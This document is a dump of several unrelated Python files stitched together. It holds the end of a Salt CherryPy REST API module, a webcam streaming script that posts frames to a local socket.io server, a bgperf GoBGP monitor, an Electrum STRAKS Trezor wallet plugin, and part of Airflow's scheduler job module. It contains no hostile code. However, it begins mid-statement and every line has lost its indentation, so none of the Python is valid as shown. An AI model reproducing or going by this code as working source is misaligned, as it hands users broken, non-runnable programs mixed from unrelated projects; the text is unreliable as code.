'upstream bug here: https://github.com/cherrypy/cherrypy/issues/1444')
return {}
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
camera.py | import cv2
import base64
from socketIO_client import SocketIO, BaseNamespace
import numpy as np
import time
from PIL import Image
from threading import Thread, ThreadError
import io
img_np = None
socketIO = SocketIO('localhost',5000)
live_namespace = socketIO.define(BaseNamespace, '/live')
def receive_events_thread():
socketIO.wait()
def on_camera_response(*args):
global img_np
img_bytes = base64.b64decode(args[0]['data'])
img_np = np.array(Image.open(io.BytesIO(img_bytes)))
def run_cam():
global img_np
while True:
try:
cv2.imshow('cam', img_np)
if cv2.waitKey(30) & 0xFF == ord('q'):
break
except:
continue
live_namespace.on('camera_update', on_camera_response)
receive_events_thread = Thread(target = receive_events_thread)
receive_cam_thread = Thread(target = run_cam)
receive_events_thread.daemon = True
receive_events_thread.start()
receive_cam_thread.daemon = True
receive_cam_thread.start()
cap = cv2.VideoCapture(0)
while True:
ret, img = cap.read()
img_b = cv2.imencode('.jpg', cv2.cvtColor(img, cv2.COLOR_BGR2RGB))[
1
].tobytes()
base64_bytes = base64.b64encode(img_b)
base64_string = base64_bytes.decode('utf-8')
live_namespace.emit('livevideo', {'data': base64_string})
time.sleep(0.05)
|
monitor.py | # Copyright (C) 2016 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gobgp import GoBGP
import os
from settings import dckr
import yaml
import json
from threading import Thread
import time
class Monitor(GoBGP):
CONTAINER_NAME = 'bgperf_monitor'
def run(self, conf, dckr_net_name=''):
ctn = super(GoBGP, self).run(dckr_net_name)
config = {}
config['global'] = {
'config': {
'as': conf['monitor']['as'],
'router-id': conf['monitor']['router-id'],
},
}
config ['neighbors'] = [{'config': {'neighbor-address': conf['target']['local-address'],
'peer-as': conf['target']['as']},
'transport': {'config': {'local-address': conf['monitor']['local-address']}},
'timers': {'config': {'connect-retry': 10}}}]
with open('{0}/{1}'.format(self.host_dir, 'gobgpd.conf'), 'w') as f:
f.write(yaml.dump(config))
self.config_name = 'gobgpd.conf'
startup = '''#!/bin/bash
ulimit -n 65536
gobgpd -t yaml -f {1}/{2} -l {3} > {1}/gobgpd.log 2>&1
'''.format(conf['monitor']['local-address'], self.guest_dir, self.config_name, 'info')
filename = '{0}/start.sh'.format(self.host_dir)
with open(filename, 'w') as f:
f.write(startup)
os.chmod(filename, 0777)
i = dckr.exec_create(container=self.name, cmd='{0}/start.sh'.format(self.guest_dir))
dckr.exec_start(i['Id'], detach=True, socket=True)
self.config = conf
return ctn
def wait_established(self, neighbor):
while True:
neigh = json.loads(self.local('gobgp neighbor {0} -j'.format(neighbor)))
if neigh['state']['session-state'] == 'established':
return
time.sleep(1)
def stats(self, queue):
def stats():
cps = self.config['monitor']['check-points'] if 'check-points' in self.config['monitor'] else []
while True:
info = json.loads(self.local('gobgp neighbor -j'))[0]
info['who'] = self.name
state = info['state']
if 'adj-table' in state and 'accepted' in state['adj-table'] and len(cps) > 0 and int(cps[0]) == int(state['adj-table']['accepted']):
cps.pop(0)
info['checked'] = True
else:
info['checked'] = False
queue.put(info)
time.sleep(1)
t = Thread(target=stats)
t.daemon = True
t.start()
|
trezor.py | from binascii import hexlify, unhexlify
from electrum_stak.util import bfh, bh2u, versiontuple
from electrum_stak.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electrum_stak import constants
from electrum_stak.i18n import _
from electrum_stak.plugins import BasePlugin, Device
from electrum_stak.transaction import deserialize, Transaction
from electrum_stak.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
def is_p2sh_segwit():
return self.derivation.startswith("m/49'/")
def is_native_segwit():
return self.derivation.startswith("m/84'/")
if is_native_segwit():
return SCRIPT_GEN_NATIVE_SEGWIT
elif is_p2sh_segwit():
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.ckd_public
import trezorlib.messages
self.client_class = client.TrezorClient
self.ckd_public = trezorlib.ckd_public
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "STRAKS"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
# FIXME the PIN prompt will appear over this message
# which makes this unreadable
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, keystore, address):
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=[change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
txinputtype.script_type = self.types.InputScriptType.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
scheduler_job.py | # pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import sched
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, Callable, DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
